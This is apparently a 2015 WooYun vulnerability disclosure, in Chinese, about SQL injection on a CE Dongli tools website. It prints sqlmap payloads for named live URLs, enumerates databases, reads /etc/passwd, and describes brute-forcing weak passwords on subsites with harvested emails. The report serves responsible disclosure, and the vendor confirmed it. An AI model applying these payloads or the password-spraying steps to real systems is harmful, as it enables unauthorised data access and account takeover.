当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146096

漏洞标题:中企动力科技股份有限公司某站存在SQL注入(DBA权限读取任意文件\3万多APP用户信息\各子站弱口令爆破)

相关厂商:中企动力科技股份有限公司

漏洞作者: 路人甲

提交时间:2015-10-12 09:37

修复时间:2015-11-26 09:58

公开时间:2015-11-26 09:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-12: 细节已通知厂商并且等待厂商处理中
2015-10-12: 厂商已经确认,细节仅向厂商公开
2015-10-22: 细节向核心白帽子及相关领域专家公开
2015-11-01: 细节向普通白帽子公开
2015-11-11: 细节向实习白帽子公开
2015-11-26: 细节向公众公开

简要描述:

利用中企动力某站的SQL注入,收集邮箱,然后在进行子站用户弱口令用户爆破。
3万多APP用户信息几乎全部都是弱口令!~~~

详细说明:

http://www.cetools.cn/index.php/cetools/login


首先burpsuite抓包测试,发现返回错误了!~~~

0.jpg


然后用sqlmap进行测试

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: POST
Parameter: username
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: username=admin' AND (SELECT 9607 FROM(SELECT COUNT(*),CONCAT(0x7165
6b6f71,(SELECT (CASE WHEN (9607=9607) THEN 1 ELSE 0 END)),0x716e706771,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'IMko'='IMko&
userpass=111111
---
[22:33:13] [INFO] testing MySQL
[22:33:13] [INFO] heuristics detected web page charset 'ascii'
[22:33:13] [WARNING] reflective value(s) found and filtering out
[22:33:13] [INFO] confirming MySQL
[22:33:13] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.54, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[22:33:13] [INFO] fetching current user
[22:33:13] [INFO] retrieved: mazheng@%
current user: 'mazheng@%'
[22:33:13] [INFO] fetching current database
[22:33:13] [INFO] retrieved: zmobile
current database: 'zmobile'
[22:33:13] [INFO] testing if current user is DBA
[22:33:13] [INFO] fetching current user
current user is DBA: True
available databases [14]:
[*] 15th
[*] 300cn
[*] ce
[*] ce300
[*] ceo8
[*] information_schema
[*] mascot
[*] mysql
[*] quartz
[*] survey
[*] test
[*] yidaba_sicms
[*] zhuanjia
[*] zmobile
Database: 15th
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| users | 20487 |
| users_bak | 20111 |
| user_score | 4993 |
| story_likes | 3775 |
| cba_vote | 3153 |
| lottery_list | 2459 |
| mascot | 1655 |
| company | 1267 |
| finalist_shangwu | 600 |
| question_bank | 293 |
| finalist_shangwujingli | 131 |
| story | 79 |
| finalist_shangwu_bak | 76 |
| xianli | 75 |
| finalist_zongjian | 37 |
| cba | 10 |
| mascot_type | 8 |
| lottery_setup | 4 |
| admin | 1 |
+----------------------------+---------+
Database: ce300
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| ce_lynum | 1534831 |
| ce_user_actions | 409816 |
| ce_votekh | 273009 |
| ce_valuation | 271209 |
| ce_votefx | 243323 |
| ce_khyx | 185060 |
| ce_vote | 162495 |
| ce_khyxgj | 160302 |
| ce_khyx_copy | 111598 |
| ce_khyx_copy_2012 | 95714 |
| ce_khtx | 95002 |
| ce_user_log | 74076 |
| ce_khyx_bak3 | 24766 |
| ce_khyx_bak2 | 18193 |
| ce_khyx_bak | 16623 |
| sms_log | 4965 |
| lottery_list | 4368 |
| area | 454 |
| area_copy | 451 |
| `area_12-03-21` | 439 |
| area_bak | 437 |
| area_bak_copy | 437 |
| ce_user_pwxg | 432 |
| ce_khyxbc | 411 |
| ce_qypx_pxzb | 352 |
| ce_user | 335 |
| ce_qypx_bmxx | 292 |
| user_u2rrelation | 228 |
| user_rolefinal | 219 |
| user_user | 178 |
| ce_votegs | 125 |
| ce_khbm | 86 |
| ce_hdgl | 85 |
| city_area | 83 |
| user_area | 83 |
| `city_area-21-03-21` | 73 |
| city_area_bak | 71 |
| user_area_ | 71 |
| ex_trade | 50 |
| user_menufinal | 37 |
| user_menu | 35 |
| task_page | 34 |
| `4in1` | 21 |
| pw_zd | 21 |
| user_role | 13 |
| user_department | 12 |
| user_menurole | 12 |
| user_positon | 12 |
| user_role2ipower | 11 |
| user_ipower | 8 |
| user_opower | 8 |
| ce_khyxbc_private | 7 |
| task_column | 6 |
| user_cpower | 6 |
| user_module | 6 |
| lottery_setup | 4 |
| task_insopdot | 4 |
| ce_valuation_count | 1 |
| task_reportrelation | 1 |
+----------------------------+---------+
Database: ceo8
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| daibiao | 3854 |
| daibiao_adds | 410 |
| bumen | 348 |
+----------------------------+---------+
Database: ce
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| ce_professional_vote_log | 12849995 |
| ce_khbm | 22533 |
| ce_khyx | 17976 |
| ce_qypx_bmxx | 5262 |
| ce_qypx_pxzb | 1654 |
| area | 454 |
| area_copy | 426 |
| ce_valuation | 231 |
| user_u2rrelation | 227 |
| user_rolefinal | 218 |
| user_user | 188 |
| _test | 170 |
| ce_hdgl | 94 |
| city_area | 82 |
| user_area | 82 |
| ce_professional_vote | 61 |
| user_menufinal | 37 |
| user_menu | 35 |
| task_page | 34 |
| ce_khyx2 | 16 |
| user_role | 13 |
| user_department | 12 |
| user_menurole | 12 |
| user_positon | 12 |
| user_role2ipower | 11 |
| user_ipower | 8 |
| user_opower | 8 |
| task_column | 6 |
| user_cpower | 6 |
| user_module | 6 |
| task_insopdot | 4 |
| ce_valuation_count | 1 |
| task_reportrelation | 1 |
+----------------------------+---------+
Database: 300cn
+----------------------------+---------+
| Table | Entries |
+----------------------------+---------+
| phome_enewsfile_1 | 366 |
| phome_enewsdolog | 333 |
| phome_ecms_issue | 301 |
| phome_ecms_issue_data_1 | 301 |
| phome_ecms_issue_index | 301 |
| phome_enewstempbak | 216 |
| phome_enewsf | 193 |
| phome_ecms_photo | 132 |
| phome_ecms_photo_data_1 | 132 |
| phome_ecms_photo_index | 132 |
| phome_enewssearch | 120 |
| phome_ecms_news_index | 106 |
| phome_ecms_news | 105 |
| phome_ecms_news_data_1 | 105 |
| phome_enewsclass | 94 |
| phome_enewsclass_stats | 94 |
| phome_enewsclassadd | 94 |
| phome_ecms_company | 74 |
| phome_ecms_company_data_1 | 74 |
| phome_ecms_company_index | 74 |
| phome_enewslog | 64 |
| phome_enewstempdt | 56 |
| phome_enewsfeedback | 48 |
| phome_enewslisttemp | 26 |
| phome_ecms_district | 24 |
| phome_ecms_district_data_1 | 24 |
| phome_ecms_district_index | 24 |
| phome_enewsbq | 23 |
| phome_enewspage | 19 |
| phome_enewstable | 19 |
| phome_enewsbqtemp | 18 |
| phome_enewsmod | 18 |
| phome_enewsnewstemp | 16 |
| phome_enewslink | 14 |
| phome_enewsuserloginck | 14 |
| phome_enewsjstemp | 13 |
| phome_enewsmemberf | 12 |
| phome_enewsuserjs | 11 |
| phome_enewsfeedbackf | 10 |
| phome_ecms_job_type | 8 |
| phome_ecms_job_type_data_1 | 8 |
| phome_ecms_job_type_index | 8 |
| phome_enewstempvar | 8 |
| phome_ecms_job | 6 |
| phome_ecms_job_data_1 | 6 |
| phome_ecms_job_index | 6 |
| phome_ecms_position | 6 |
| phome_ecms_position_data_1 | 6 |
| phome_ecms_position_index | 6 |
| phome_enewsshoppayfs | 6 |
| phome_enewsuser | 6 |
| phome_enewsuseradd | 6 |
| phome_enewsnotcj | 5 |
| phome_ecms_enter | 4 |
| phome_ecms_enter_data_1 | 4 |
| phome_ecms_enter_index | 4 |
| phome_enewsbqclass | 4 |
| phome_enewsclassnavcache | 4 |
| phome_enewsgroup | 4 |
| phome_enewsmembergroup | 4 |
| phome_enewspageclass | 4 |
| phome_enewsplayer | 4 |
| phome_enewsshopps | 4 |
| phome_enewsfeedbackclass | 3 |
| phome_enewspayapi | 3 |
| phome_enewssearchtemp | 3 |
| phome_enewsadminstyle | 2 |
| phome_enewsclasstemp | 2 |
| phome_enewsmemberform | 2 |
| phome_enewssearchall | 2 |
| phome_enewsspacestyle | 2 |
| phome_enewsvotetemp | 2 |
| phome_enewswapstyle | 2 |
| phome_ecms_infoclass_news | 1 |
| phome_ecms_news_check | 1 |
| phome_ecms_news_check_data | 1 |
| phome_enewsadclass | 1 |
| phome_enewsclass_stats_set | 1 |
| phome_enewsdo | 1 |
| phome_enewsgbookclass | 1 |
| phome_enewsinfoclass | 1 |
| phome_enewsloginfail | 1 |
| phome_enewsmember | 1 |
| phome_enewsmemberadd | 1 |
| phome_enewsmoreport | 1 |
| phome_enewspagetemp | 1 |
| phome_enewspicclass | 1 |
| phome_enewspl_set | 1 |
| phome_enewspltemp | 1 |
| phome_enewspostserver | 1 |
| phome_enewsprinttemp | 1 |
| phome_enewspublic | 1 |
| phome_enewspublic_update | 1 |
| phome_enewspubtemp | 1 |
| phome_enewssearchall_load | 1 |
| phome_enewsshop_set | 1 |
| phome_enewstempgroup | 1 |
| phome_enewsuserclass | 1 |
| phome_enewsztclass | 1 |
+----------------------------+---------+
Database: quartz
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| QRTZ_JOB_DETAILS | 8 |
| QRTZ_TRIGGERS | 7 |
| QRTZ_CRON_TRIGGERS | 6 |
| QRTZ_LOCKS | 5 |
| QRTZ_SCHEDULER_STATE | 2 |
| QRTZ_SIMPLE_TRIGGERS | 1 |
+----------------------+---------+
Database: survey
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| zmobile_speed | 235 |
| zmobile_company | 76 |
| zmobile_site | 1 |
+----------------------+---------+
Database: mysql
+----------------------+---------+
| Table | Entries |
+----------------------+---------+
| help_relation | 1009 |
| help_topic | 510 |
| help_keyword | 453 |
| help_category | 40 |
| `user` | 15 |
| proc | 4 |
| db | 2 |
+----------------------+---------+
Database: test
+------------+---------+
| Table | Entries |
+------------+---------+
| test_sms | 22 |
+------------+---------+
Database: zhuanjia
+------------+---------+
| Table | Entries |
+------------+---------+
| vote | 30 |
| daka | 11 |
+------------+---------+
Database: zmobile
+------------+---------+
| Table | Entries |
+------------+---------+
| appuser | 31922 |
| favorite | 8314 |
| adminlog | 2593 |
| article | 1953 |
| passreset | 569 |
| article1 | 106 |
| `language` | 2 |
| admin | 1 |
| demoappver | 1 |
+------------+---------+
Database: yidaba_sicms
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| CMS_LOG | 329833 |
| TBL_TRS_u$_temp | 325509 |
| CMS_INFOMATION_RELATION | 109519 |
| CMS_INFOMATION | 70854 |
| CMS_TRS_ARTICLE_QUEUE | 56134 |
| CMS_INFOMATION_SITE_NODE | 55322 |
| CMS_ARTICLE | 55130 |
| CMS_KEYWORD | 50737 |
| CMS_COUNT | 35694 |
| CMS_IMAGE | 26831 |
| CMS_TEMPLATE_FILE | 6685 |
| RM_AUTHORIZE | 5932 |
| CMS_TEMPLATE_VERSION | 5748 |
| RM_RESOURCE | 3898 |
| CMS_REP_VALUES | 2889 |
| CMS_DATA_SOURCE | 2403 |
| CMS_TEMPLATE_SITE_NODE | 1943 |
| CMS_SITE_NODE | 1772 |
| CMS_SITE_NODE_RELATION | 1772 |
| CMS_FEATURE_PUBLISH | 1494 |
| cms_article | 1468 |
| CMS_TAG_BUNDLE | 1235 |
| CMS_TEMPLATE | 1123 |
| CMS_SPECIAL_EDITION_CONTENT | 1114 |
| CMS_COLUMN | 1090 |
| CMS_SPECIAL_EDITION | 585 |
| CMS_HOT_WORD | 414 |
| RM_CODE_DATA | 270 |
| RM_PARTY_ROLE | 233 |
| RM_PARTY | 161 |
| CMS_PUBLISH_QUEUE | 113 |
| RM_USER | 95 |
| CMS_CHANNEL | 93 |
| CMS_FEATURE_MODULE | 85 |
| RM_FUNCTION_NODE | 82 |
| RM_CODE_TYPE | 54 |
| CMS_CUSTOM_ATTRIBUTE_RULE | 52 |
| CMS_FEATURE_TABLE | 48 |
| Zues_Migration | 38 |
| _ts | 35 |
| RM_ROLE | 15 |
| CMS_PUBLISH_JAVA_CLASS | 10 |
| CMS_SHORCUT | 6 |
| CMS_SITE_NODE_TYPE | 6 |
| CMS_CHANNEL_GROUP | 3 |
| CMS_FEATURE | 3 |
| RM_ACCESS_TYPE_RULE | 3 |
| CMS_LOG_TYPE | 2 |
| RM_AUTHORIZE_TYPE | 2 |
| CMS_RSS_RULE | 1 |
| CMS_SITE | 1 |
| CMS_SITE_VIEW | 1 |
| QRTZ_SCHEDULER_STATE | 1 |
| RM_ACCESSORIAL_DATA_RULE | 1 |
+-----------------------------+---------+


Zmobile是中企动力研发的一款基于云平台的企业手机客户端产品,能够帮助企业在手机上宣传品牌,展示产品,联系客户。全触控操作,互动方便,视觉效果美观(页面简洁、唯美),操作简单易用(手机上输入域名直接打开或扫描二维码来访问或安装使用),随时随地通过手机快捷访问,传播企业品牌,展示产品信息或服务。

1.jpg


2.jpg


3.jpg


4.jpg


可读取任意文件

[22:48:08] [INFO] testing MySQL
[22:48:08] [INFO] confirming MySQL
[22:48:08] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003
web application technology: Apache 2.0.54, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[22:48:08] [INFO] fingerprinting the back-end DBMS operating system
[22:48:08] [INFO] the back-end DBMS operating system is Linux
[22:48:08] [INFO] fetching file: '/etc/passwd'
you provided a HTTP Cookie header value. The target URL provided its own cookies
within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] n
[22:48:10] [INFO] heuristics detected web page charset 'ascii'
[22:48:10] [WARNING] reflective value(s) found and filtering out
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
mysql:x:500:500::/home/mysql:/bin/bash
memcached:x:498:499:Memcached daemon:/var/run/memcached:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
hacluster:x:497:498:heartbeat user:/var/lib/heartbeat/cores/hacluster:/sbin/nolo
gin
ntp:x:38:38::/etc/ntp:/sbin/nologin
kaifa:x:501:501::/home/ka
do you want confirmation that the remote file '/etc/passwd' has been successfull
y downloaded from the back-end DBMS file system? [Y/n] y


进入后台后,有参数可以进行SQL注入

http://www.cetools.cn/index.php/example/show_one?id=3677
id存在注入
http://www.cetools.cn/index.php/example/show_one?id=3677'
返回错误
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
update article set pv=pv+1 where id=3677'
Filename: /ce300/page/cetools/models/cetools_admin_demo_model.php
Line Number: 74


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3677 AND 1680=1680
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=3677 AND (SELECT 8189 FROM(SELECT COUNT(*),CONCAT(0x716a6f7271,(
SELECT (CASE WHEN (8189=8189) THEN 1 ELSE 0 END)),0x7162756d71,FLOOR(RAND(0)*2))
x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=3677 AND SLEEP(5)
---
[02:08:06] [INFO] testing MySQL
[02:08:07] [INFO] heuristics detected web page charset 'ascii'
[02:08:07] [WARNING] reflective value(s) found and filtering out
[02:08:07] [INFO] confirming MySQL
[02:08:08] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.0.54, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[02:08:08] [INFO] fetching current user
[02:08:09] [INFO] retrieved: mazheng@%
current user: 'mazheng@%'
[02:08:09] [INFO] fetching current database
[02:08:09] [INFO] retrieved: zmobile
current database: 'zmobile'
[02:08:09] [INFO] testing if current user is DBA
[02:08:09] [INFO] fetching current user
current user is DBA: True


利用上述SQL注入得到的用户或者邮箱信息,对以下几个子站进行弱口令用户爆破
主站也测试看看

http://www.cetools.cn/index.php/cetools/login


爆破1.jpg


爆破2.jpg


爆破3.jpg


爆破4.jpg


1、

http://ku.cetools.cn/login.asp


ku2645.jpg


ku大于2645小于2782.jpg


2、

http://fy.cetools.cn/login.asp


1.jpg


2.jpg


3.jpg


3、

http://share.cetools.cn/index/login.asp


1.jpg


2.jpg


基本上每个子站都有100左右的123456弱口令用户(至少在测试的1000多个里面),就不将其贴出来了,厂商自己排查吧!~~~

漏洞证明:

如上

修复方案:

过滤修复
修改弱口令

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-12 09:56

厂商回复:

正在处理

最新状态:

暂无